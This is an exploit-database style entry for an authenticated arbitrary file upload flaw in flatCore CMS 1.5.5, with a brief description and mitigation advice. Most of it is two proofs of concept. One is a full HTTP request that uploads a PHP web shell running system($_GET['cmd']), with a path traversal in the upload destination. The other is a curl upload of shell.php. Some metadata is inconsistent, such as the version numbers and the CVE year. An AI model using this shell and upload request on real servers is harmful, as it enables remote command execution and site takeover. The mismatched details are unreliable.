flatCore 1.5.5 - Arbitrary File Upload

vendor:

flatCore CMS

by:

CodeSecLab

6.1

CVSS

HIGH

Arbitrary File Upload

434

CWE

Product Name: flatCore CMS

Affected Version From: 1.5.2005

Affected Version To: 1.5.2005

Patch Exists: NO

Related CWE: CVE-2019-10652

CPE: a:flatcore:flatcore_cms:1.5.5

Metasploit:

Other Scripts:

Platforms Tested: Ubuntu, Windows

2024

flatCore 1.5.5 – Arbitrary File Upload

An arbitrary file upload vulnerability exists in flatCore 1.5.5, allowing attackers to upload malicious PHP files via the admin panel. By intercepting and modifying the upload request, an attacker can upload a PHP backdoor file to gain unauthorized access to the system.

Mitigation:

To mitigate this vulnerability, restrict file upload types to only allow specific file formats, sanitize file names to prevent executable file uploads, and implement proper file permission settings. Regularly monitor uploaded files for malicious content.

Source

Exploit-DB raw data:

# Exploit Title: flatCore 1.5.5 - Arbitrary File Upload
# Date: 2024-10-26
# Exploit Author: CodeSecLab
# Vendor Homepage: https://github.com/flatCore/flatCore-CMS
# Software Link: https://github.com/flatCore/flatCore-CMS
# Version: 1.5.5
# Tested on: Ubuntu Windows
# CVE : CVE-2019-10652
PoC：
1)
1. Access the flatCore Admin Panel
URL: http://flatcore/acp/acp.php
Log in with valid administrative credentials.
2. Upload a Malicious PHP File
Navigate to the upload section where you can add new files or images. This is usually accessible via the "Media" or "Addons" feature in the admin panel.
3. Intercept and Modify the Upload Request
Using a tool like Burp Suite or by modifying the request directly, prepare the following POST request:

POST /acp/core/files.upload-script.php HTTP/1.1
Host: flatcore
Content-Type: multipart/form-data; boundary=---------------------------735323031399963166993862150
Content-Length: <calculated length>
Cookie: PHPSESSID=<valid_session_id>

-----------------------------735323031399963166993862150
Content-Disposition: form-data; name="file"; filename="exploit.php"
Content-Type: application/octet-stream

<?php
// Simple PHP backdoor code
echo "Vulnerable File Upload - PoC";
system($_GET['cmd']);
?>
-----------------------------735323031399963166993862150
Content-Disposition: form-data; name="upload_destination"

../content/files
-----------------------------735323031399963166993862150
Content-Disposition: form-data; name="csrf_token"

<valid_csrf_token>
-----------------------------735323031399963166993862150
Note: Replace <valid_session_id> and <valid_csrf_token> with values from your authenticated session.
4. Verification
After uploading, the PHP file should be accessible at: http://flatcore/content/files/exploit.php
Access the uploaded file: http://flatcore/content/files/exploit.php?cmd=whoami

PoC 
2)
# PoC to exploit unrestricted file upload vulnerability in flatCore 1.4.7
# Target URL: http://flatcore/
# The attacker must be authenticated as an administrator to exploit this vulnerability

# Step 1: Log in as an administrator and obtain the CSRF token
# You need to obtain the CSRF token manually or through a script since the token is required for the file upload.

# Step 2: Upload a malicious PHP file using the file upload feature

# Create a PHP reverse shell or any arbitrary PHP code and save it as shell.php
echo "<?php phpinfo(); ?>" > shell.php

# Upload the PHP file using cURL
curl -X POST "http://flatcore/acp/core/files.upload-script.php" \
    -H "Content-Type: multipart/form-data" \
    -F "file=@shell.php" \
    -F "csrf_token=YOUR_CSRF_TOKEN_HERE" \
    -F "upload_destination=../content/files" \
    -F "file_mode=overwrite" \
    -b "PHPSESSID=YOUR_SESSION_ID_HERE"

# Replace YOUR_CSRF_TOKEN_HERE and YOUR_SESSION_ID_HERE with valid CSRF token and PHPSESSID

# Step 3: Access the uploaded malicious PHP file
echo "Visit the following URL to execute the uploaded PHP file:"
echo "http://flatcore/content/files/shell.php"

This PoC demonstrates how an attacker can exploit the unrestricted file upload vulnerability to upload a PHP file and execute it on the server.
[Replace Your Domain Name]